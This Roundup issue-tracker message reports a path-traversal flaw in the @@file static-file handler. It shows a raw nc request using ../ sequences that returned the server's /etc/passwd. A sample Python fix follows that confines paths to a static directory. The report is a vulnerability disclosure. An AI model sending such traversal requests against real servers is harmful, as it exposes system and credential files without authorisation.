Roundup Tracker - Issues

Message 1272

Author: kent_turbo
Date: 2004-05-27.11:51:39
Roundup uses /home/@@file/ prefix to get static files
from the filesystem. It does not restrict in any way
the files that are handled.

I have a roundup tracker home at /home/kent/cit, then I
do the following:

kent@kent:~$ nc localhost 8080
GET /cit/@@file/../../../../etc/passwd HTTP/1.0
Host: kent

HTTP/1.0 200 OK
Server: BaseHTTP/0.3 Python/2.3.3
Date: Thu, 27 May 2004 11:47:04 GMT
Last-Modifed: Tue, 18 May 2004 14:00:15 GMT
Content-Length: 1088
Content-Type: text/plain
Pragma: no-cache

and my actual /etc/passwd follows.

Perhaps the roundup web interface should restrict @@file
requests to some directory.
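One way to implement the restriction the report asks for, as an added example that is not Roundup's own code: map the part of the URL after `@@file/` onto a fixed static directory and refuse anything whose normalized path leaves it. The tracker home `/home/kent/cit` and the `/cit/@@file/` URL form come from the report; the `html` subdirectory is an assumption.

```python
import posixpath

# Assumptions for this example (not stated in the report): static files
# live under <tracker home>/html, with the tracker home from the report.
TRACKER_HOME = "/home/kent/cit"
STATIC_SUBDIR = "html"


def static_base(tracker_home=TRACKER_HOME):
    """Directory that @@file requests are allowed to read from."""
    return posixpath.normpath(posixpath.join(tracker_home, STATIC_SUBDIR))


def resolve_static_file(rel_path, tracker_home=TRACKER_HOME):
    """Return the filesystem path for a '@@file/<rel_path>' request, or
    None when the request would resolve outside the static directory.
    rel_path is assumed to be already URL-decoded; decode before calling."""
    base = static_base(tracker_home)
    # Absolute paths and NUL bytes are never legitimate static-file names.
    if rel_path.startswith("/") or "\x00" in rel_path:
        return None
    # normpath collapses '.' and '..', so '../../../../etc/passwd' joined
    # onto the base becomes '/etc/passwd' and can be compared lexically.
    candidate = posixpath.normpath(posixpath.join(base, rel_path))
    # Require base + '/' as a prefix: rejects the base directory itself and
    # sibling directories such as '<base>2'. This is a lexical check only;
    # a deployment should additionally realpath() to account for symlinks.
    if not candidate.startswith(base + "/"):
        return None
    return candidate


def handle_request_path(url_path, tracker_home=TRACKER_HOME):
    """Take a request path such as '/cit/@@file/style.css', extract the
    part after '@@file/' and resolve it. None means the request is refused."""
    marker = "/@@file/"
    pos = url_path.find(marker)
    if pos == -1:
        return None
    return resolve_static_file(url_path[pos + len(marker):], tracker_home)


if __name__ == "__main__":
    # The request from the report beside a legitimate static-file request.
    for path in ("/cit/@@file/../../../../etc/passwd", "/cit/@@file/style.css"):
        print(path, "->", handle_request_path(path))
```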
History

Date                 User   Action  Args
2009-02-03 14:20:45  admin  link    issue961511 messages
2009-02-03 14:20:45  admin  create